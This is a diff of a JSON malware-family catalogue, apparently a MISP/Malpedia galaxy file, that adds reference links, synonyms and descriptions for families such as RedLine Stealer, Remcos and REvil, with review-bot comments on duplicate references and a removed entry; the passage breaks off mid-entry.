@@ -14119,13 +25836,32 @@ "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, + { + "description": "A family identified by ESET Research in the InvisiMole campaign.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm", + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "165f385f-8507-4cd3-9afd-911a016b2d29", + "value": "RC2FM" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], "synonyms": [ @@ -14137,6 +25873,19 @@ "uuid": "c359c74e-4155-4e66-a344-b56947f75119", "value": "RCS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40eff712-4812-4b8a-872d-7c9f4b7a8d72", + "value": "RCtrl" + }, { "description": "", "meta": { 
@@ -14150,6 +25899,22 @@ "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", "value": "rdasrv" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", + "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" + ], + "synonyms": [ + "GREYSTUFF" + ], + "type": [] + }, + "uuid": "69798a1e-1caf-4bc8-b4af-6508d8a26717", + "value": "RDAT" + }, { "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { @@ -14171,7 +25936,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" ], "synonyms": [], "type": [] 
@@ -14196,33 +25962,113 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman",
- "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "http://blog.macnica.net/blog/2017/12/post-8c22.html",
+ "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
+ "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+ ],
+ "synonyms": [
+ "BUGJUICE"
+ ],
+ "type": []
+ },
+ "uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
+ "value": "RedLeaves"
+ },
+ {
+ "description": "Redline Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. 
This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of Redliune added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b",
- "value": "Redaman"
+ "uuid": "ff18a858-7778-485c-949b-d28d867d1ffb",
+ "value": "RedLine Stealer"
 },
 {
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
- "http://blog.macnica.net/blog/2017/12/post-8c22.html",
- "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
- 
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
- "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
- "https://www.jpcert.or.jp/magazine/acreport-redleaves.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper",
+ "https://twitter.com/ItsReallyNick/status/1136502701301346305"
+ ],
+ "synonyms": [
+ "Adupib"
+ ],
+ "type": []
+ },
+ "uuid": "42fc1cf4-23ee-47a6-bdd3-7dc824948ba7",
+ "value": "REDPEPPER"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum",
+ "https://id-ransomware.blogspot.com/2019/12/redrum-ransomware.html"
+ ],
+ "synonyms": [
+ "Grinch",
+ "Thanos",
+ "Tycoon"
+ ],
+ "type": []
+ },
+ "uuid": "cbb4cfd8-3642-4b04-a199-8e9b4b80fb62",
+ "value": "RedRum Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt",
+ "https://twitter.com/ItsReallyNick/status/1136502701301346305",
+ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf"
+ ],
+ "synonyms": [
+ "Dipsind"
+ ],
+ "type": []
+ },
+ "uuid": "da2210c7-c953-4367-9f4b-778e77af7ce7",
+ "value": "REDSALT"
+ },
+ {
+ "description": "REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": 
"a70e93a7-3578-47e1-9926-0818979ed866",
- "value": "RedLeaves"
+ "uuid": "799cce43-6ba0-4e21-9a63-f8b7f9bb7cc4",
+ "value": "REDSHAWL"
 },
 {
 "description": "",
@@ -14278,11 +26124,16 @@
 "value": "reGeorg"
 },
 {
- "description": "",
+ "description": "Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin",
- "https://www.youtube.com/watch?v=jeLd-gw2bWo"
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo",
+ "https://www.epicturla.com/previous-works/hitb2020-voltron-sta",
+ "https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf"
 ],
 "synonyms": [],
 "type": []
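Review bot: The Redaman entry (`"uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b"`, malpedia ref `win.redaman`) is deleted in this hunk and nothing inside the hunk re-adds it, whereas RedLeaves is only moved; if Redaman has been dropped from the cluster rather than relocated elsewhere in the file, any event or taxonomy tag that carries that UUID now points at a galaxy entry that no longer exists. Cluster UUIDs are the stable identifier consumers key on, so a retired family is better kept with its UUID than removed outright; worth confirming against the rest of the file before merging. Separately, the rebuilt RedLeaves refs list holds two Accenture URLs that differ only in `__w__` versus `_w_` and two copies of the same JPCERT post (`blogs.jpcert.or.jp/en/...` and `blog.jpcert.or.jp/.s/...`), which looks like duplication rather than distinct sources. The enclosing array of cluster entries starts and ends outside the hunk.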
@@ -14294,20 +26145,117 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
- "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "http://malware-traffic-analysis.net/2017/12/22/index.html",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
- "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
- "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
- "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
- "https://secrary.com/ReversingMalware/RemcosRAT/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker",
+ "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/",
+ "https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/",
+ "https://twitter.com/malwrhunterteam/status/1321375502179905536"
 ],
 "synonyms": [],
 "type": []
 },
+ "uuid": "f89df0d5-2d01-49a2-a2d0-71cdc6a9d64e",
+ "value": "RegretLocker"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom",
+ "https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html"
+ ],
+ "synonyms": [
+ "GHack Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "b59a97df-04c5-4e54-a7aa-92452baa7240",
+ "value": "RekenSom Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader",
+ "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "431808a0-3671-4072-a9af-9947a54b4b9d",
+ "value": "Rekt Loader"
+ },
+ {
+ "description": 
"",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rektware",
+ "https://id-ransomware.blogspot.com/2018/09/rektware-ransomware.html"
+ ],
+ "synonyms": [
+ "PRZT Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "b40a66c6-c8fa-43c3-8084-87e90f00a8f1",
+ "value": "Rektware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom",
+ "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef"
+ ],
+ "synonyms": [
+ "RemoteCommandExecution"
+ ],
+ "type": []
+ },
+ "uuid": "135ce3db-a242-4f81-844a-cf03eb72c291",
+ "value": "RemCom"
+ },
+ {
+ "description": "Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user. \r\nRemcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns. 
",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
+ "https://dissectingmalwa.re/malicious-ratatouille.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD",
+ "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
+ "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
+ "https://secrary.com/ReversingMalware/RemcosRAT/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "http://malware-traffic-analysis.net/2017/12/22/index.html",
+ "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
+ 
"https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/",
+ "https://www.youtube.com/watch?v=DIH4SvKuktM"
+ ],
+ "synonyms": [
+ "RemcosRAT",
+ "Remvio",
+ "Socmer"
+ ],
+ "type": []
+ },
 "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2",
 "value": "Remcos"
 },
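Review bot: The new Remcos refs list contains the same Symantec Elfin/APT33 post twice, once as `"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage"` and once as `"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"`; the hunk at `@@ -14316,22 +26264,61 @@` does the same for Remexi, removing the `www.symantec.com` Chafer link and re-adding it beside its `symantec-blogs.broadcom.com` copy. One of each pair should be dropped, or the two hostnames normalised before refs are merged, otherwise every later sync keeps growing these lists with migrated duplicates. The Remcos description string also appears to end in trailing whitespace after `hacking campaigns.`, harmless for JSON but visible in any UI that renders the description. The enclosing array of cluster entries starts and ends outside the hunk.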
@@ -14316,22 +26264,61 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
- "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
 "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
- "https://securelist.com/chafer-used-remexi-malware/89538/"
+ "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://securelist.com/chafer-used-remexi-malware/89538/",
+ "https://twitter.com/QW5kcmV3/status/1095833216605401088"
+ ],
+ "synonyms": [
+ "CACHEMONEY"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada",
 "value": "Remexi"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remoteadmin",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=hacktool:win32/remoteadmin&ThreatID=2147731874"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6730a859-f2b9-48f9-8d2b-22944a79c072",
+ "value": "RemoteAdmin"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient",
+ "https://github.com/frozleaf/RemoteControl"
+ ],
+ "synonyms": [
+ "remotecontrolclient"
+ ],
+ "type": []
+ },
+ "uuid": "44aae79d-c2f5-47f6-99c1-540c0c5420db",
+ "value": "RemoteControl"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf"
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf",
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html",
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html"
 ],
 "synonyms": [],
 "type": []
@@ -14344,9 +26331,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy",
- "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html"
+ "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
+ ],
+ "synonyms": [
+ "WINDSHIELD"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c",
@@ -14370,7 +26360,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/",
+ "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/"
 ],
 "synonyms": [],
 "type": []
@@ -14383,12 +26374,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
+ "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
 "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
 "https://github.com/cocaman/retefe",
 "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
 "https://www.govcert.admin.ch/blog/35/reversing-retefe",
 "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
- "https://github.com/Tomasuh/retefe-unpacker"
+ "https://github.com/Tomasuh/retefe-unpacker",
+ "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/"
 ],
 "synonyms": [
 "Tsukuba",
@@ -14399,14 +26392,38 @@
 "uuid": "96bf1b6d-28e1-4dd9-aabe-23050138bc39",
 "value": "Retefe (Windows)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro",
+ "https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/",
+ "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4dc538e-09b7-4dba-99b0-e8b8b70dd42a",
+ "value": "Retro"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
 "https://isc.sans.edu/diary/rss/22590",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/"
+ "https://securelist.com/revengehotels/95229/",
+ "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
+ "https://blogs.360.cn/post/APT-C-44.html",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g"
 ],
 "synonyms": [
 "Revetrat"
@@ -14416,12 +26433,137 @@
 "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f",
 "value": "Revenge RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton",
+ "https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48c10822-9af8-4324-9516-b33ecf975590",
+ "value": "Reveton Ransomware"
+ },
+ {
+ "description": "REvil Beta\r\nMD5: bed6fc04aeb785815744706239a1f243\r\nSHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf\r\nSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45\r\n* Privilege escalation via CVE-2018-8453 (64-bit only)\r\n* Rerun with RunAs to elevate privileges\r\n* Implements a requirement that if \"exp\" is set, privilege escalation must be successful for full execution to occur\r\n* Implements target whitelisting using GetKetboardLayoutList\r\n* Contains debug console logging functionality\r\n* Defines the REvil registry root key as SOFTWARE\\!test\r\n* Includes two variable placeholders in the ransom note: UID & KEY\r\n* Terminates processes specified in the \"prc\" configuration key prior to encryption\r\n* Deletes shadow copies and disables recovery\r\n* Wipes contents of folders specified in the \"wfld\" configuration key prior to encryption\r\n* Encrypts all non-whitelisted files on fixed drives\r\n* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe\r\n* Partially implements a background image setting to display a basic \"Image text\" message\r\n* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)\r\n------------------------------------\r\nREvil 1.00\r\nMD5: 65aa793c000762174b2f86077bdafaea\r\nSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457\r\nSHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc\r\n* Adds 32-bit 
implementation of CVE-2018-8453 exploit\r\n* Removes console debug logging\r\n* Changes the REvil registry root key to SOFTWARE\\recfg\r\n* Removes the System/Impersonation success requirement for encrypting network mapped drives\r\n* Adds a \"wipe\" key to the configuration for optional folder wiping\r\n* Fully implements the background image setting and leverages values defined in the \"img\" configuration key\r\n* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT\r\n* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL\r\n* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data\r\n------------------------------------\r\nREvil 1.01\r\nMD5: 2abff29b4d87f30f011874b6e98959e9\r\nSHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c\r\nSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb\r\n* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level\r\n* Makes encryption of network mapped drives optional by adding the \"-nolan\" argument\r\n------------------------------------\r\nREvil 1.02\r\nMD5: 4af953b20f3a1f165e7cf31d6156c035\r\nSHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299\r\nSHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4\r\n* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage\r\n* Partially implements \"lock file\" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. 
There is no evidence that a lock file is dropped to disk.)\r\n* Enhances folder whitelisting logic that take special considerations if the folder is associated with \"program files\" directories\r\n* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories\r\n* Hard-codes whitelisting of \"sql\" subfolders within program files\r\n* Encrypts program files sub-folders that does not contain \"sql\" in the path\r\n* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted\r\n* Encodes stored strings used for URI building within the binary and decodes them in memory right before use\r\n* Introduces a REvil registry root key \"sub_key\" registry value containing the attacker's public key\r\n------------------------------------\r\nREvil 1.03\r\nMD5: 3cae02306a95564b1fff4ea45a7dfc00\r\nSHA1: 0ce2cae5287a64138d273007b34933362901783d\r\nSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf\r\n* Removes lock file logic that was partially implemented in 1.02\r\n* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)\r\n* Encodes stored shellcode\r\n* Adds the -path argument:\r\n* Does not wipe folders (even if wipe == true)\r\n* Does not set desktop background\r\n* Does not contact the C2 server (even if net == true)\r\n* Encrypts files in the specified folder and drops the ransom note\r\n* Changes the REvil registry root key to SOFTWARE\\QtProject\\OrganizationDefaults\r\n* Changes registry key values from --> to:\r\n * sub_key --> pvg\r\n * pk_key --> sxsP\r\n * sk_key --> BDDC8\r\n * 0_key --> f7gVD7\r\n * 